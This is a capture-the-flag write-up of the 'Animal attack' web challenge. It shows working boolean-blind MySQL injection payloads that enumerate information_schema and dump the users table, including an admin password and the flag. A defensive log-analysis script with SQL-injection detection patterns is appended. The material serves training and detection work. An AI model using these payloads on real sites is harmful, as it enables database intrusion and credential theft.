Tags: web sqli 

Rating: 5.0

# ▼▼▼Animal attack (200pts)(115/607=18.9%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
Animals have taken over our world and a specific team of animal spies have taken the role of leading the entire army of animals. We humans have formed a group of rebels who have taken it up as a mission to find the main users of the animal spies and find the admin of that group. The admin, with his username and password can launch a powerful attack on the humans. Help the human rebels group get the world back from the animals.

The portal is available at :- http://128.199.224.175:24000/
```

---

**【Information gathering】**

Insert one single quote: `'`

```
You queried for : '
Sorry, we couldn't find any agent with the given name!
```

Insert two single quotes: `''`

```
You queried for : ''
```

Insert three single quotes: `'''`

```
You queried for : '''
Sorry, we couldn't find any agent with the given name!
```

Insert four single quotes: `''''`

```
You queried for : ''''
```

An even number of quotes gives a normal response and an odd number gives the "not found" page, so the quotes are reaching the SQL query unescaped: SQL injection is possible!!

※When the SQL statement errors out, the application appears to handle the error itself (only the "Sorry, we couldn't find any agent" message is shown), so no database error message is leaked.

---

**【Identification of DB】**

`'or''=''#`

Since this returns a normal response, the `#` comment syntax is accepted, which confirms that the backend is `MySQL`

---

**【Try1: UNION based SQL Injection】**

`'UNION SELECT 1#`

`Oooh !! We got a HACKER over here ...`

I inserted only a plain UNION, but the `UNION` keyword itself seems to be detected by a WAF.

---

**【Try2:Blind SQL Injection】**

`0'or'1'='1'#` ⇒ all rows are shown

`0'or'1'='0'#` ⇒ nothing is shown

Blind SQL injection is possible !!

---

Substitute ● = 1, 2, 3, … (the character position) and ▲ = 32 ~ 126 (the printable ASCII range) into the payload below, and extract the data one character at a time, using binary search over ▲ for each position.

Encode the payload as `Base64` before sending it

`0'or ord(substr((select group_concat(table_name,":",column_name) from information_schema.columns where table_schema=database()),●,1))>▲-- `

```
$ python BlindSql.py
s
sp
spi
spie
spies
spies:
spies:i
spies:id
spies:id,
spies:id,s
spies:id,sp
spies:id,spi
spies:id,spie
spies:id,spies
spies:id,spies:
spies:id,spies:n
spies:id,spies:na
spies:id,spies:nam
spies:id,spies:name
spies:id,spies:name,
spies:id,spies:name,s
spies:id,spies:name,sp
spies:id,spies:name,spi
spies:id,spies:name,spie
spies:id,spies:name,spies
spies:id,spies:name,spies:
spies:id,spies:name,spies:a
spies:id,spies:name,spies:ag
spies:id,spies:name,spies:age
spies:id,spies:name,spies:age,
spies:id,spies:name,spies:age,s
spies:id,spies:name,spies:age,sp
spies:id,spies:name,spies:age,spi
spies:id,spies:name,spies:age,spie
spies:id,spies:name,spies:age,spies
spies:id,spies:name,spies:age,spies:
spies:id,spies:name,spies:age,spies:e
spies:id,spies:name,spies:age,spies:ex
spies:id,spies:name,spies:age,spies:exp
spies:id,spies:name,spies:age,spies:expe
spies:id,spies:name,spies:age,spies:exper
spies:id,spies:name,spies:age,spies:experi
spies:id,spies:name,spies:age,spies:experie
spies:id,spies:name,spies:age,spies:experien
spies:id,spies:name,spies:age,spies:experienc
spies:id,spies:name,spies:age,spies:experience
spies:id,spies:name,spies:age,spies:experience,
spies:id,spies:name,spies:age,spies:experience,s
spies:id,spies:name,spies:age,spies:experience,sp
spies:id,spies:name,spies:age,spies:experience,spi
spies:id,spies:name,spies:age,spies:experience,spie
spies:id,spies:name,spies:age,spies:experience,spies
spies:id,spies:name,spies:age,spies:experience,spies:
spies:id,spies:name,spies:age,spies:experience,spies:d
spies:id,spies:name,spies:age,spies:experience,spies:de
spies:id,spies:name,spies:age,spies:experience,spies:des
spies:id,spies:name,spies:age,spies:experience,spies:desc
spies:id,spies:name,spies:age,spies:experience,spies:descr
spies:id,spies:name,spies:age,spies:experience,spies:descri
spies:id,spies:name,spies:age,spies:experience,spies:descrip
spies:id,spies:name,spies:age,spies:experience,spies:descript
spies:id,spies:name,spies:age,spies:experience,spies:descripti
spies:id,spies:name,spies:age,spies:experience,spies:descriptio
spies:id,spies:name,spies:age,spies:experience,spies:description
spies:id,spies:name,spies:age,spies:experience,spies:description,
spies:id,spies:name,spies:age,spies:experience,spies:description,u
spies:id,spies:name,spies:age,spies:experience,spies:description,us
spies:id,spies:name,spies:age,spies:experience,spies:description,use
spies:id,spies:name,spies:age,spies:experience,spies:description,user
spies:id,spies:name,spies:age,spies:experience,spies:description,users
spies:id,spies:name,spies:age,spies:experience,spies:description,users:
spies:id,spies:name,spies:age,spies:experience,spies:description,users:i
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,u
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,us
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,use
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,user
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:u
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:us
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:use
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:user
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:usern
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:userna
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:usernam
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,u
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,us
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,use
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,user
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:p
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:pa
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:pas
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:pass
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:passw
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:passwo
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:passwor
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,u
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,us
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,use
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,user
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:e
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:em
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:ema
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:emai
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:email
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:email
```

---

Similarly, extract the data from the `users` table using the column names found above:

`0'or ord(substr((select group_concat(id,":",username,":",password,":",email) from users),●,1))>▲-- `

```
$ python BlindSql.py
1
1:
1:a
1:ad
1:adm
1:admi
1:admin
1:admin:
1:admin:p
1:admin:pc
1:admin:pct
1:admin:pctf
1:admin:pctf{
1:admin:pctf{L
1:admin:pctf{L3
1:admin:pctf{L31
1:admin:pctf{L31'
1:admin:pctf{L31's
1:admin:pctf{L31's~
1:admin:pctf{L31's~@
1:admin:pctf{L31's~@L
1:admin:pctf{L31's~@Ll
1:admin:pctf{L31's~@Ll_
1:admin:pctf{L31's~@Ll_h
1:admin:pctf{L31's~@Ll_h4
1:admin:pctf{L31's~@Ll_h4i
1:admin:pctf{L31's~@Ll_h4il
1:admin:pctf{L31's~@Ll_h4il-
1:admin:pctf{L31's~@Ll_h4il-1
1:admin:pctf{L31's~@Ll_h4il-1h
1:admin:pctf{L31's~@Ll_h4il-1h3
1:admin:pctf{L31's~@Ll_h4il-1h3-
1:admin:pctf{L31's~@Ll_h4il-1h3-c
1:admin:pctf{L31's~@Ll_h4il-1h3-c4
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Q
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu3
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:s
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:sp
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_a
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_ad
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_adm
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admi
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@a
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@ad
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@adm
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@admi
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@admin
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@admin.
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected]
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected]
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected]
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:t
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:te
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:tes
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:t
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:te
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:tes
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test:
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test:t
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test:te
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test:tes
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test:test
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test:test
```
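Seen from the defender's side, the two extraction steps above leave a recognisable trail: the WAF blocked only `UNION`, while the `'or` tautology and the Base64-encoded `ord(substr(...))` oracle went through, and a binary search over ASCII 32 ~ 126 costs about seven requests per extracted character. The following script is my own added example (not part of the writeup or the challenge): it decodes the query parameter, matches those signatures against constructed access-log lines and flags clients that send many such requests; the IPs, timestamps and the `name` parameter are assumptions.

```python
import base64
import binascii
import re
from collections import Counter
from urllib.parse import parse_qs, quote, urlsplit

SIGNATURES = {
    "union_select": re.compile(r"union\s+select", re.I),           # 'UNION SELECT 1#
    "quote_or": re.compile(r"'\s*or\b", re.I),                     # 0'or'1'='1'#, 'or''=''#
    "char_oracle": re.compile(r"ord\s*\(\s*substr\s*\(", re.I),    # boolean-blind character test
    "schema_enum": re.compile(r"information_schema", re.I),        # table/column enumeration
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
def decode_candidates(value):
    """Inspect the raw parameter and, when it is valid Base64, its decoding as well."""
    cands = [value]
    try:
        cands.append(base64.b64decode(value, validate=True).decode("utf-8"))
    except (binascii.Error, UnicodeDecodeError):
        pass
    return cands
def analyse(lines):
    """Return (hits, per_ip): signature names matched per request and hit counts per client."""
    hits, per_ip = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, query = m.group(1), urlsplit(m.group(2)).query
        matched = set()
        for values in parse_qs(query).values():          # parse_qs also URL-decodes
            for cand in (c for v in values for c in decode_candidates(v)):
                matched.update(n for n, rx in SIGNATURES.items() if rx.search(cand))
        if matched:
            hits.append((ip, sorted(matched)))
            per_ip[ip] += 1
    return hits, per_ip
def probing_clients(per_ip, min_hits=7):
    """Clients with >= min_hits flagged requests: one binary-searched character is ~7 queries."""
    return sorted(ip for ip, n in per_ip.items() if n >= min_hits)
def make_log(ip, name):
    """Constructed Apache-style access-log line; the name parameter is URL-encoded."""
    return f'{ip} - - [01/Jan/2020:00:00:00 +0000] "GET /?name={quote(name, safe="")} HTTP/1.1" 200 512'
ORACLE = ("0'or ord(substr((select group_concat(table_name,\":\",column_name) from "
          "information_schema.columns where table_schema=database()),1,1))>{}-- ")
SAMPLE_LOG = [make_log("10.0.0.2", "panda"), make_log("10.0.0.3", "0'or'1'='1'#"),
              make_log("10.0.0.3", "'UNION SELECT 1#")] + [
    make_log("10.0.0.5", base64.b64encode(ORACLE.format(t).encode()).decode())
    for t in (64, 96, 112, 120, 116, 114, 115)]   # one binary-search run, Base64 as in the writeup
```

Keyword blocklisting on the WAF caught only `union_select`; the real fix is parameterised queries on the server, with this kind of log review as the detective control.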

`pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}`